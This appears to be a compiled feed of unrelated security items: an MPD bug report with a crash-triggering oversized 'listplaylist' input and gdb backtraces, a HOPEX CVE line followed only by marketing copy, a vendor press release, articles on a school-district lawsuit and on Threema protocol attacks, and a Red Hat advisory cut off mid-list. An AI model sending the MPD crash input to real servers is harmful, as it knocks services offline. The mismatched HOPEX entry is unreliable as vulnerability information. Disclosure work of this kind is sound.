An issue in MPD (Music Player Daemon) v0.23.10 allows attackers to cause a Denial of Service (DoS) via a crafted input.

**Bug report****Describe the bug**

When sending 1. large input and 2. that would trigger the logging of an error on MPD on windows, MPD just segfaults. For instance, sending listplaylist <400 times 'A'> swiftly makes MPD segfaults.

The error probably stems from https://github.com/MusicPlayerDaemon/MPD/blob/master/src/system/Error.hxx#L94-L95 , and the fact that snprintf returns the _number of bytes which would have been written to the final string if enough space had been available_ (https://linux.die.net/man/3/snprintf), and not the number of bytes actually written.  
I think changing it by a min(return\_value, 512) would work and I'd gladly submit a PR if that's the way to go :)

It also means that it's possible to write 0x3a20 (which corresponds to the :  manually written) about anywhere on the stack, which leads to crashes when it's written to, for instance, rip, but could probably be used for more malicious purposes.

**Expected Behavior**

MPD does not crash when sent arbitrary big input.

**Actual Behavior**

MPD crashes when sent big payloads.

**Version**

    PS C:\Users\Paul\Downloads> .\mpd.exe --version
    Music Player Daemon 0.23.10 (0.23.10)
    Copyright 2003-2007 Warren Dukes <warren.dukes@gmail.com>
    Copyright 2008-2021 Max Kellermann <max.kellermann@gmail.com>
    This is free software; see the source for copying conditions.  There is NO
    warranty; not even MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.
    
    Database plugins:
     simple proxy
    
    Storage plugins:
     local nfs curl
    
    
    Decoders plugins:
     [vorbis] ogg oga
     [oggflac] ogg oga
     [flac] flac
     [opus] opus ogg oga
     [dsdiff] dff
     [dsf] dsf
     [hybrid_dsd] m4a
     [openmpt] mptm mod s3m xm it 669 amf ams c67 dbm digi dmf dsm dtm far imf ice j2b m15 mdl med mms mt2 mtm nst okt plm psm pt36 ptm sfx sfx2 st26 stk stm stp ult wow gdm mo3 oxm umx xpk ppm mmcmp
     [modplug] 669 amf ams dbm dfm dsm far it med mdl mod mtm mt2 okt s3m stm ult umx xm
     [wildmidi] mid
     [ffmpeg] 16sv 3g2 3gp 4xm 8svx aa3 aac ac3 adx afc aif aifc aiff al alaw amr anim apc ape asf atrac au aud avi avm2 avs bap bfi c93 cak cin cmv cpk daud dct divx dts dv dvd dxa eac3 film flac flc fli fll flx flv g726 gsm gxf iss m1v m2v m2t m2ts m4a m4b m4v mad mj2 mjpeg mjpg mka mkv mlp mm mmf mov mp+ mp1 mp2 mp3 mp4 mpc mpeg mpg mpga mpp mpu mve mvi mxf nc nsv nut nuv oga ogm ogv ogx oma ogg omg opus psp pva qcp qt r3d ra ram rl2 rm rmvb roq rpl rvc shn smk snd sol son spx str swf tak tgi tgq tgv thp ts tsp tta xa xvid uv uv2 vb vid vob voc vp6 vmd wav webm wma wmv wsaud wsvga wv wve
     [gme] ay gbs gym hes kss nsf nsfe rsn sap spc vgm vgz
     [pcm]
    
    Filters:
    
    
    Tag plugins:
    
    
    Output plugins:
     null jack httpd snapcast recorder winmm wasapi
    
    Encoder plugins:
     null vorbis opus lame wave flac
    
    Input plugins:
     file curl ffmpeg nfs
    
    Playlist plugins:
     extm3u m3u pls xspf asx rss flac cue embcue
    
    Protocols:
     http:// https:// nfs://
    
    Other features:
     ipv6 tcp
    PS C:\Users\Paul\Downloads>
    

**Configuration**

    music_directory		"C:/Users/Paul/Downloads/Music"
    playlist_directory		"C:/Users/Paul/Downloads/playlists"
    log_file			"C:/Users/Paul/Downloads/log"
    
    audio_output {
    	type		"null"
    	name		"My Null Output"
    }
    
    database {
    plugin "simple"
    path "C:/Users/Paul/Downloads/database"
    }
    

**Log**

The backtrace is misleading, since we're dealing with stack frame corruptions here, but added a few excerpts, depending on the length of the payload:

    PS C:\Users\Paul\Downloads> gdb --args mpd --stderr --no-daemon --verbose mpd.conf
    GNU gdb (GDB) (Cygwin 11.2-1) 11.2
    Copyright (C) 2022 Free Software Foundation, Inc.
    License GPLv3+: GNU GPL version 3 or later <http://gnu.org/licenses/gpl.html>
    This is free software: you are free to change and redistribute it.
    There is NO WARRANTY, to the extent permitted by law.
    Type "show copying" and "show warranty" for details.
    This GDB was configured as "x86_64-pc-cygwin".
    Type "show configuration" for configuration details.
    For bug reporting instructions, please see:
    <https://www.gnu.org/software/gdb/bugs/>.
    Find the GDB manual and other documentation resources online at:
        <http://www.gnu.org/software/gdb/documentation/>.
    
    For help, type "help".
    Type "apropos word" to search for commands related to "word"...
    Reading symbols from mpd...
    (gdb) run
    Starting program: /cygdrive/c/Users/Paul/Downloads/mpd --stderr --no-daemon --verbose mpd.conf
    [New Thread 17592.0x512c]
    [New Thread 17592.0x4248]
    [New Thread 17592.0x2140]
    warning: Invalid parameter passed to C runtime function.
    config_file: loading file mpd.conf
    warning: Invalid parameter passed to C runtime function.
    vorbis: Xiph.Org libVorbis 1.3.7
    opus: libopus 1.3.1
    hybrid_dsd: The Hybrid DSD decoder is disabled because it was not explicitly enabled
    decoder: Decoder plugin 'wildmidi' is unavailable: configuration file does not exist: /etc/timidity/timidity.cfg
    simple_db: reading DB
    curl: version 7.85.0
    curl: with Schannel
    input: Input plugin 'ffmpeg' is unavailable: No protocol
    [New Thread 17592.0x28a4]
    [New Thread 17592.0x1834]
    client: [0] opened from 192.168.0.60:15032
    client: [0] process command "listplaylist AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"
    
    Thread 1 received signal SIGSEGV, Segmentation fault.
    0x0000203a560f6c54 in ?? ()
    (gdb) bt
    #0  0x0000203a560f6c54 in ?? ()
    Backtrace stopped: previous frame identical to this frame (corrupt stack?)
    (gdb)
    

or

    (gdb) run mpd.conf
    Starting program: /cygdrive/c/Users/Paul/Downloads/mpd mpd.conf
    [New Thread 6764.0x4328]
    [New Thread 6764.0xb08]
    [New Thread 6764.0x204c]
    warning: Invalid parameter passed to C runtime function.
    warning: Invalid parameter passed to C runtime function.
    Nov 27 23:28 : decoder: Decoder plugin 'wildmidi' is unavailable: configuration file does not exist: /etc/timidity/timidity.cfg
    [New Thread 6764.0x448c]
    [New Thread 6764.0x18fc]
    
    Thread 1 received signal SIGSEGV, Segmentation fault.
    0x00007ff77f0d4166 in GetFullMessage[abi:cxx11](std::exception const&, char const*, char const*) (e=..., fallback=fallback@entry=0x7ff77f3d9be3 "Unknown exception", separator=separator@entry=0x7ff77f3d9be0 "; ") at ../../src/util/Exception.cxx:60
    60      ../../src/util/Exception.cxx: No such file or directory.
    (gdb) bt
    #0  0x00007ff77f0d4166 in GetFullMessage[abi:cxx11](std::exception const&, char const*, char const*) (e=...,
        fallback=fallback@entry=0x7ff77f3d9be3 "Unknown exception", separator=separator@entry=0x7ff77f3d9be0 "; ")
        at ../../src/util/Exception.cxx:60
    #1  0x00007ff77f0d4102 in GetFullMessage[abi:cxx11](std::__exception_ptr::exception_ptr, char const*, char const*) (
        ep=..., fallback=fallback@entry=0x7ff77f3d9be3 "Unknown exception", separator=separator@entry=0x7ff77f3d9be0 "; ")
        at ../../src/util/Exception.cxx:72
    #2  0x00007ff77f0ef783 in Log (level=level@entry=LogLevel::ERROR, ep=...) at ../../src/Log.cxx:44
    #3  0x00007ff77f0e33e8 in LogError (ep=...) at ../../src/Log.hxx:141
    #4  playlist_open_path_suffix (mutex=..., path=...) at ../../src/playlist/PlaylistStream.cxx:50
    #5  playlist_open_path (path=..., mutex=...) at ../../src/playlist/PlaylistStream.cxx:62
    #6  0x00007ff77f0e698a in playlist_open_in_playlist_dir (mutex=..., uri=0x29a3fe864f5 'A' <repeats 200 times>...)
        at ../../src/util/StringPointer.hxx:54
    #7  playlist_mapper_open (uri=0x29a3fe864f5 'A' <repeats 200 times>..., storage=0x29a416f3dc0, mutex=...)
        at ../../src/playlist/PlaylistMapper.cxx:79
    #8  0x00007ff77f0dfba9 in playlist_open_any (located_uri=..., storage=<optimized out>, mutex=...)
        at ../../src/playlist/PlaylistAny.cxx:46
    #9  0x00007ff77f0e55c9 in playlist_file_print (r=..., partition=..., loader=..., uri=..., detail=detail@entry=false)
        at ../../src/playlist/Print.cxx:71
    #10 0x00007ff77f0e4f02 in handle_listplaylist (client=..., args=..., r=...) at ../../src/client/Client.hxx:255
    #11 0x00007ff77f0d8e33 in command_process (client=..., num=num@entry=0, line=line@entry=0x29a3fe864e8 "listplaylist")
        at ../../src/command/AllCommands.cxx:432
    #12 0x00007ff77f18864d in Client::ProcessLine (this=this@entry=0x29a3fe864d0, line=<optimized out>,
        line@entry=0x29a3fe864e8 "listplaylist") at ../../src/client/Process.cxx:137
    #13 0x00007ff77f188e53 in Client::OnSocketInput (length=<optimized out>, data=0x29a3fe864e8, this=0x29a3fe864d0)
        at ../../src/client/Read.cxx:49
    #14 Client::OnSocketInput (this=0x29a3fe864d0, data=0x29a3fe864e8, length=<optimized out>)
        at ../../src/client/Read.cxx:29
    #15 0x00007ff77f129b95 in BufferedSocket::ResumeInput (this=this@entry=0x29a3fe864d0)
        at ../../src/event/BufferedSocket.cxx:76
    #16 0x00007ff77f129dc9 in BufferedSocket::OnSocketReady (this=0x29a3fe864d0, flags=<optimized out>)
        at ../../src/event/BufferedSocket.cxx:113
    #17 0x00007ff77f19c552 in EventLoop::Run (this=this@entry=0xe4983fd378) at ../../src/event/Loop.cxx:362
    #18 0x00007ff77f0f8bf3 in MainConfigured (options=..., raw_config=...) at ../../src/Main.cxx:576
    #19 0x00007ff77f0f4478 in MainOrThrow (argc=argc@entry=2, argv=argv@entry=0x29a3fe81850) at ../../src/Main.cxx:691
    #20 0x00007ff77f0f1e19 in mpd_main (argc=argc@entry=2, argv=argv@entry=0x29a3fe81850) at ../../src/Main.cxx:697
    #21 0x00007ff77f0cd60a in win32_main (argc=argc@entry=2, argv=argv@entry=0x29a3fe81850)
        at ../../src/win32/Win32Main.cxx:137
    #22 0x00007ff77f38075e in main (argc=2, argv=0x29a3fe81850) at ../../src/Main.cxx:707
    (gdb)

CVE-2022-46449: MPD crashes on windows when large input is submitted · Issue #1676 · MusicPlayerDaemon/MPD

A link-manipulation issue was discovered in Mega HOPEX 15.2.0.6110 before V5CP4.

**Architecting a Future-Proof Enterprise to Plan and Adapt to Change**

Build a digital representation of your enterprise by connecting business, IT, data, and risk perspectives in a single platform to share a single source of truth. Derive actionable insights and collaborate with stakeholders to align on your company’s business objectives and demonstrate the immediate business value of your projects. Seamlessly integrate the HOPEX Platform into your digital ecosystem for faster time-to-value.

Shift from a documentation tool to an operational tool and accelerate business transformation

Turn your data into a strategic asset

Optimize and transform your business processes

Federate your GRC activities to enhance operational resilience

**HOPEX Platform Main Benefits**

HOPEX improves collaboration and alignment by removing silos and sharing a single source of truth to all business and IT stakeholders. They get actionable insights to make the right decisions using a smart, automated, and connected platform.

**Smart: Get data-driven insights based on algorithms**

Get smart recommendations based on data-driven algorithms and share actionable insights using a collaborative enterprise portal and mobile apps that increase decision-making velocity.

**Connected: Improve collaboration and alignment**

Use automated discovery of applications, data, and processes as well as automated diagram generation and intelligent workflows to improve productivity, accelerate project delivery, and reduce time-to-value.

**Automated: Accelerate your project delivery**

Improve collaboration, develop synergies, avoid duplicative efforts, and ensure stakeholder alignment on strategic objectives by connecting strategy, business, IT, data, and risk perspectives on the same platform.

Scalable, Secure and Flexible SaaS Solution

The MEGA HOPEX Platform is available on SaaS giving you the flexibility and scalability required to meet the ever-changing needs of your business. It relies on Microsoft Azure infrastructure using industry-leading security measures and privacy policies, while adhering to international compliance programs. MEGA HOPEX successfully completed the SOC 2 Type 2 examination, based on the trust principles of security, availability, and confidentiality.

**HOPEX Platform Main Capabilities**

Reporting and dashboarding

Use out-of-the-box templates or build your own reports to monitor and govern your projects with actionable insights and recommendations.

Assessment engine

Launch surveys and assessment campaigns to quickly build and update your repository using a crowdsourcing approach.

Intuitive modeling engine

Build business process, IT and data diagrams to visually communicate how your operations work and see how business, IT, and data are connected.

Intuitive workflows

Simply built workflows  foster collaboration among all stakeholders and accelerate business value delivery.

Enterprise portal

Share insights across your organization and demonstrate tangible business results to the C-suite with HOPEX 360, a ready-to-use enterprise portal.

Contextual search

Easily find accurate and trusted data using a modern contextual search engine and further filter to narrow your search results.

Flexible metamodel configurability

Adapt MEGA HOPEX to your operating model with easy-to-use customization options, and expand functionalities as well as import ready-to-use content through the HOPEX store.

Open APIs

Based on Microsoft Azure and certified SOC2, MEGA HOPEX cloud is perfectly suited to your business needs and your security imperatives.

Gartner Peer Insights

MEGA International received the 2022 Gartner Customers’ Choice recognition for Enterprise Architecture tools

**Accelerate the delivery of your projects with out of the box integrations**

**Standardize your practice by following leading frameworks and meeting compliance requirements**

**Take a test drive**

Sign up for a 30-day trial version to see how you can demonstrate immediate value of your projects.

CVE-2022-38482: HOPEX Platform

2023 Security Service Edge (SSE) Adoption Report finds that SSE technology addresses key pain points including much-needed solution consolidation, transition to hybrid work and need for hardened security.

**PLANO, Texas****,** **Jan. 10, 2023** **/PRNewswire/ --** Axis, in partnership with Cybersecurity Insiders, released industry-first data with its 2023 Security Service Edge (SSE) Adoption Report. This report distills insights from 355 cybersecurity professionals on the migration from legacy access solutions such as Virtual Private Networks (VPNs) in light of the new hybrid workplace and the rapidly growing SSE market.

With 88% of organizations supporting a hybrid or remote work model, it's clear that the way people work has changed, thus organizations are realizing that the means in which secure access is achieved must also adapt.

**SSE is crowned queen when it comes to securing the modern workplace**

In just under two years since the term was first introduced, SSE has become immensely popular, with nearly three out of four cybersecurity professionals (71%) now familiar with the category. The study found that SSE now ranks as more critical than SSO, MFA, endpoint security, and SIEM when it comes to zero trust. Furthermore, 65% of organizations plan to adopt an SSE platform in the next 24 months, with 43% planning on implementing it before the end of 2023.

This year the industry will see SSE quickly become a top strategic initiative for organizations as it plays a major role in Secure Access Service Edge (SASE) adoption, and successful Zero Trust implementation. 67% state that they will start their SASE strategy with an SSE platform, compared to 33% with SD-WAN. One bonus statistic that was uncovered was regards to single-vendor SASE vs. multi-vendor SASE preference. The audience was split (~50% for each).

**The benefits of SSE for cost reduction and productivity are clear drivers of business adoption**

The impact of remote and hybrid work has led to the proliferation of security solutions for organizations. The research found that 63% of enterprises have 3 or more security solutions in use to enable access, while nearly a quarter leverage 6 or more. This contributes to an increase in costs to the business, and complexity in management. Respondents stated that complexity in access management ranked second, right behind the fact legacy access solutions grant too much inherent trust to users – when it came to top challenges.

SSE services provide a means of reducing costs and reliance on the internal appliance stack and external appliance stack in a new macroeconomic climate. The top two legacy solutions that enterprise security teams will look to replace with SSE will be VPN Concentrators (63%) for VPN, SSL inspection services (50%) and DDoS (44%) with data loss prevention services (42%) being a very close fourth place.

Cost reduction, high availability, and reliability, have long been benefits of cloud services. Hence, it was not surprising that 60% of respondents said that they prefer SSE services built on a public cloud backbone. In addition, there was overwhelming agreement that including Digital Experience Monitoring (DEM) is important for any SSE platform (90%). As teams evaluate SSE, they are prioritizing platforms with DEM capabilities.

As teams contemplate where they should begin utilizing SSE for their business, nearly 50% of organizations have decided to start by securing access for their remote and hybrid employees. And, given the mass adoption of hybrid work, this a logical starting point for the businesses.

"Uncovering this data shines light on the truth about SSE adoption in the context of SASE, the criticality of SSE compared to other zero trust ecosystem technologies, and the positive impact SSE has on business as they transform" said Dor Knafo, Co-founder and CEO of Axis. "We are even more excited to continue to build on our Atmos SSE platform for our customers, and deliver on the promise of SSE and SASE, as we continue our mission of harmonizing secure access for the modern workplace."

Read the full 2023 Security Service Edge Adoption report here

**About Axis Security**

Axis' vision is to bring harmony to workplace connectivity and that the sooner IT adopts zero trust, the sooner we can witness a world where the exchange of information is always fast, seamless, and secure. With 350 Axis cloud service edges across the world, Axis helps IT leaders enable their employees, partners, and customers to securely access business data without the pitfalls of network-centric solutions or application limitations that every other zero trust service faces. Through its world-class research and development and founding team which hails from Israel's acclaimed Unit 8200, Axis aims to accelerate the world's transition to a modern workplace where hybrid work is made simple, digital experience becomes a competitive advantage and business data remains protected from cyber threats even as it moves to the cloud. For more information, visit www.axissecurity.com. Follow us on Twitter and on LinkedIn.

SOURCE Axis Security

65% of Organizations Plan to Adopt a Security Service Edge Platform in Next 2 Years: Axis Security

Categories: News
Tags: Facebook

Tags:  Instagram

Tags:  Snapchat

Tags:  TikTok

Tags:  YouTube

Tags:  Section 230

Tags:  Seattle Public School

Tags:  SPS

Tags:  Meta

Tags:  Alphabet

Tags:  Snap

Tags:  ByteDance

A whole school district in Seattle is suing social media giants for causing harm to kids and youths.



(Read more...)




The post US school district sues Facebook, Instagram, Snapchat, TikTok over harm to kids appeared first on Malwarebytes Labs.

Public schools in a Seattle district filed a lawsuit on Friday against parent companies of the biggest social networks on the internet, alleging social media is to blame for "a youth mental health crisis", and saying these companies have purposefully designed, refined, and operated their platforms in a way that "exploit\[s\] the neurophysiology" of children's and youths' brains.

The companies they sued are Meta for Facebook and Instagram, Snap for Snapchat, ByteDance for TikTok, and Alphabet for YouTube.

In a brief about this case, Seattle Public Schools said:

> "Students in the Seattle Public Schools, like students around the country, are struggling with anxiety, depression, thoughts of self-harm, and suicidal ideation, which led King County to join the US Surgeon General last year in recognizing the youth mental health crisis in this community. According to the Surgeon General, one in five children aged 13 to 17 now suffer from a mental health disorder."
> 
> "More than 90% of youth today use social media. Most youth primarily use five platforms: YouTube, TikTok, Snapchat, Instagram, and Facebook, on which they spend many hours a day. Research tells us that excessive and problematic use of social media is harmful to the mental, behavioral, and emotional health of youth and is associated with increased rates of depression, anxiety, low self-esteem, eating disorders, and suicide."

**Cyberbullying**

The school district also pins the blame for online bullying on social networks. "The more time an individual, especially males, spend on social media, the more likely they are to commit acts of cyberbullying," the complaint alleges, citing research on cyberbullies from 2021. Youths experience bullying acts online like name calling; being subjected to false rumors; receiving unsolicited explicit media or threats of bodily harm; online stalking; and revenge porn.

Multiple studies have shown cyberbullying has numerous mental, emotional, and behavioral effects on everyone involved. This includes anxiety, depression, and sleep deprivation, to name a few. The lawsuit mentions that students experiencing these mental health issues "perform worse in school, are less likely to attend school, more likely to engage in substance use, and to act out.” All these, the SPS argues, "affects Seattle Public Schools' ability to fulfil its educational mission".

**Immune to liability, per Section 230?**

When it comes to potential counter-arguments, Seattle Public Schools appears to have foreseen that the companies will hide behind Section 230 of the Community Decency Act. This specific section expressly says: "No provider or user of an interactive computer service shall be treated as the publisher or speaker of any information provided by another information content provider." However, the district isn't arguing that the companies should be liable for their users’ posts but that Section 230 shouldn't shield them from the consequences of their conduct.

"Plaintiff \[school district\] is not alleging Defendants \[social media companies\] are liable for what third-parties have said on Defendants' platforms but, rather, for Defendants' own conduct," the complaint says. "Defendants affirmatively recommend and promote harmful content to youth, such as proanorexia and eating disorder content. Recommendation and promotion of damaging material is not a traditional editorial function and seeking to hold Defendants liable for these actions is not seeking to hold them liable as a publisher or speaker of third party-content."

Seattle Public Schools further alleges the companies are liable for "their own affirmative conduct in recommending and promoting harmful content to youth", "their own actions designing and marketing their social media platforms in a way that causes harm", "the content they create that causes harm", and "for distributing, delivering, and/or transmitting material that they know or have reason to know is harmful, unlawful, and/or tortious".

When Ars Technica reached out to Meta for comments, the company said it developed more than 30 tools, such as supervisory and age verification tools, that aid teens and families.

"We automatically set teens' accounts to private when they join Instagram, and we send notifications encouraging them to take regular breaks," a spokesperson went on to say. "We don't allow content that promotes suicide, self-harm, or eating disorders, and of the content we remove or take action on, we identify over 99 percent of it before it's reported to us. We'll continue to work closely with experts, policymakers, and parents on these important issues."

**We don't just report on threats—we remove them**

Cybersecurity risks should never spread beyond a headline. Keep threats off your devices by downloading Malwarebytes today.

US school district sues Facebook, Instagram, Snapchat, TikTok over harm to kids

A comprehensive analysis of the cryptographic protocols used in the Swiss encrypted messaging application Threema has revealed a number of loopholes that could be exploited to break authentication protections and even recover users' private keys.
The seven attacks span three different threat models, according to ETH Zurich researchers Kenneth G. Paterson, Matteo Scarlata, and Kien Tuong Truong,

A comprehensive analysis of the cryptographic protocols used in the Swiss encrypted messaging application Threema has revealed a number of loopholes that could be exploited to break authentication protections and even recover users' private keys.

The seven attacks span three different threat models, according to ETH Zurich researchers Kenneth G. Paterson, Matteo Scarlata, and Kien Tuong Truong, who reported the issues to Threema on October 3, 2022. The weaknesses have since been addressed as part of updates released by the company on November 29, 2022.

Threema is an encrypted messaging app that's used by more than 11 million users as of October 2022. "Security and privacy are deeply ingrained in Threema's DNA," the company claims on its website.

Officially used by the Swiss Government and the Swiss Army, it's also advertised as a secure alternative alongside other services such as Signal, Meta-owned WhatsApp, and Telegram.

While Threema has been subjected to third-party code audits at least twice – once in 2019 and a second time in 2020 – the latest findings show that they weren't thorough enough to uncover the problems present in the "cryptographic core of the application."

"Ideally, any application using novel cryptographic protocols should come with its own formal security analyses (in the form of security proofs) in order to provide strong security assurances," the researchers said.

In a nutshell, the attacks could pave the way for a wide range of exploitation scenarios, namely allowing an attacker to impersonate a client, reorder the sequence of messages exchanged between two parties, clone the account of a victim user, and even leverage the backup mechanism to recover the user's private key.

The latter two attack pathways, which require direct access to a victim's device, could have severe consequences, as it enables the adversary to stealthily access the users' future messages without their knowledge.

Also uncovered is a case of replay and reflection attack related to its Android app that occurs when users reinstall the app or change devices, granting a bad actor with access to Threema servers to replay old messages. A similar replay attack was identified in January 2018.

Last but not least, an adversary could also stage what's called a Kompromat attack wherein a malicious server tricks a client "into unwittingly encrypting a message of the server's choosing that can be delivered to a different user."

It's worth noting that this attack was previously reported to Threema by University of Erlangen-Nuremberg researcher Jonathan Krebs, prompting the company to ship fixes in December 2021 (version 4.62 for Android and version 4.6.14 for iOS).

"Using modern, secure libraries for cryptographic primitives does not, on its own, lead to a secure protocol design," the researchers said. "Libraries such as NaCl or libsignal can be misused while building more complex protocols and developers must be wary not to be lulled into a false sense of security."

"While the mantra 'don't roll your own crypto' is now widely known, it should be extended to 'don't roll your own cryptographic protocol' (assuming one already exists that meets the developer's requirements)," they added. "In the case of Threema, the bespoke C2S protocol could be replaced by TLS."

When reached for comment, Threema told The Hacker News that it has released a new communication protocol called **Ibex** that renders "some of the issues obsolete," adding it "acted instantly to implement fixes for all findings within weeks."

"While some of the findings \[...\] may be interesting from a theoretical standpoint, none of them ever had any considerable real-world impact," the company further noted. "Most assume extensive and unrealistic prerequisites that would have far greater consequences than the respective finding itself."

It also pointed out that some of the attacks bank on having physical access to an unlocked mobile device over an extended time period, at which point the "entire device must be considered compromised."

The study arrives almost six months after ETH Zurich researchers detailed critical shortcomings in the MEGA cloud storage service that could be weaponized to crack the private keys and fully compromise the privacy of the uploaded files.

Then in September 2022, another group of researchers disclosed a host of security flaws in the Matrix decentralized, real-time communication protocol that grant a malicious server operator the ability to read messages and impersonate users, effectively undermining the confidentiality and authenticity of the service.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Expert Analysis Reveals Cryptographic Weaknesses in Threema Messaging App

Red Hat Security Advisory 2023-0045-01 - Virtual Network Computing is a remote display system which allows users to view a computing desktop environment not only on the machine where it is running, but from anywhere on the Internet and from a wide variety of machine architectures. TigerVNC is a suite of VNC servers and clients. Issues addressed include out of bounds access and use-after-free vulnerabilities.

-----BEGIN PGP SIGNED MESSAGE-----  
Hash: SHA256

=====================================================================  
                   Red Hat Security Advisory

Synopsis:          Important: tigervnc security update  
Advisory ID:       RHSA-2023:0045-01  
Product:           Red Hat Enterprise Linux  
Advisory URL:      https://access.redhat.com/errata/RHSA-2023:0045  
Issue date:        2023-01-09  
CVE Names:         CVE-2022-4283 CVE-2022-46340 CVE-2022-46341   
                   CVE-2022-46342 CVE-2022-46343 CVE-2022-46344   
=====================================================================

1. Summary:

An update for tigervnc is now available for Red Hat Enterprise Linux 7.

Red Hat Product Security has rated this update as having a security impact  
of Important. A Common Vulnerability Scoring System (CVSS) base score,  
which gives a detailed severity rating, is available for each vulnerability  
from the CVE link(s) in the References section.

2. Relevant releases/architectures:

Red Hat Enterprise Linux Client (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Client Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux ComputeNode Optional (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Server (v. 7) - noarch, ppc64, ppc64le, s390x, x86_64  
Red Hat Enterprise Linux Server Optional (v. 7) - noarch, ppc64, ppc64le, x86_64  
Red Hat Enterprise Linux Workstation (v. 7) - noarch, x86_64  
Red Hat Enterprise Linux Workstation Optional (v. 7) - noarch, x86_64

3. Description:

Virtual Network Computing (VNC) is a remote display system which allows  
users to view a computing desktop environment not only on the machine where  
it is running, but from anywhere on the Internet and from a wide variety of  
machine architectures. TigerVNC is a suite of VNC servers and clients.

Security Fix(es):

* xorg-x11-server: X.Org Server XkbGetKbdByName use-after-free  
(CVE-2022-4283)

* xorg-x11-server: X.Org Server XTestSwapFakeInput stack overflow  
(CVE-2022-46340)

* xorg-x11-server: X.Org Server XIPassiveUngrab out-of-bounds access  
(CVE-2022-46341)

* xorg-x11-server: X.Org Server XvdiSelectVideoNotify use-after-free  
(CVE-2022-46342)

* xorg-x11-server: X.Org Server ScreenSaverSetAttributes use-after-free  
(CVE-2022-46343)

* xorg-x11-server: X.Org Server XIChangeProperty out-of-bounds access  
(CVE-2022-46344)

For more details about the security issue(s), including the impact, a CVSS  
score, acknowledgments, and other related information, refer to the CVE  
page(s) listed in the References section.

4. Solution:

For details on how to apply this update, which includes the changes  
described in this advisory, refer to:

https://access.redhat.com/articles/11258

5. Bugs fixed (https://bugzilla.redhat.com/):

2151755 - CVE-2022-46340 xorg-x11-server: X.Org Server XTestSwapFakeInput stack overflow  
2151756 - CVE-2022-46341 xorg-x11-server: X.Org Server XIPassiveUngrab out-of-bounds access  
2151757 - CVE-2022-46342 xorg-x11-server: X.Org Server XvdiSelectVideoNotify use-after-free  
2151758 - CVE-2022-46343 xorg-x11-server: X.Org Server ScreenSaverSetAttributes use-after-free  
2151760 - CVE-2022-46344 xorg-x11-server: X.Org Server XIChangeProperty out-of-bounds access  
2151761 - CVE-2022-4283 xorg-x11-server: X.Org Server XkbGetKbdByName use-after-free

6. Package List:

Red Hat Enterprise Linux Client (v. 7):

Source:  
tigervnc-1.8.0-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-23.el7_9.noarch.rpm  
tigervnc-license-1.8.0-23.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Client Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-23.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode (v. 7):

Source:  
tigervnc-1.8.0-23.el7_9.src.rpm

noarch:  
tigervnc-license-1.8.0-23.el7_9.noarch.rpm

x86_64:  
tigervnc-debuginfo-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux ComputeNode Optional (v. 7):

noarch:  
tigervnc-icons-1.8.0-23.el7_9.noarch.rpm  
tigervnc-server-applet-1.8.0-23.el7_9.noarch.rpm

x86_64:  
tigervnc-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-module-1.8.0-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server (v. 7):

Source:  
tigervnc-1.8.0-23.el7_9.src.rpm

noarch:  
tigervnc-icons-1.8.0-23.el7_9.noarch.rpm  
tigervnc-license-1.8.0-23.el7_9.noarch.rpm

ppc64:  
tigervnc-1.8.0-23.el7_9.ppc64.rpm  
tigervnc-debuginfo-1.8.0-23.el7_9.ppc64.rpm  
tigervnc-server-1.8.0-23.el7_9.ppc64.rpm  
tigervnc-server-minimal-1.8.0-23.el7_9.ppc64.rpm

ppc64le:  
tigervnc-1.8.0-23.el7_9.ppc64le.rpm  
tigervnc-debuginfo-1.8.0-23.el7_9.ppc64le.rpm  
tigervnc-server-1.8.0-23.el7_9.ppc64le.rpm  
tigervnc-server-minimal-1.8.0-23.el7_9.ppc64le.rpm

s390x:  
tigervnc-1.8.0-23.el7_9.s390x.rpm  
tigervnc-debuginfo-1.8.0-23.el7_9.s390x.rpm  
tigervnc-server-1.8.0-23.el7_9.s390x.rpm  
tigervnc-server-minimal-1.8.0-23.el7_9.s390x.rpm

x86_64:  
tigervnc-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-debuginfo-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-1.8.0-23.el7_9.x86_64.rpm  
tigervnc-server-minimal-1.8.0-23.el7_9.x86_64.rpm

Red Hat Enterprise Linux Server Optional (v. 7):

noarch:  
tigervnc-server-applet-1.8.0-23.el7_9.noarch.rpm

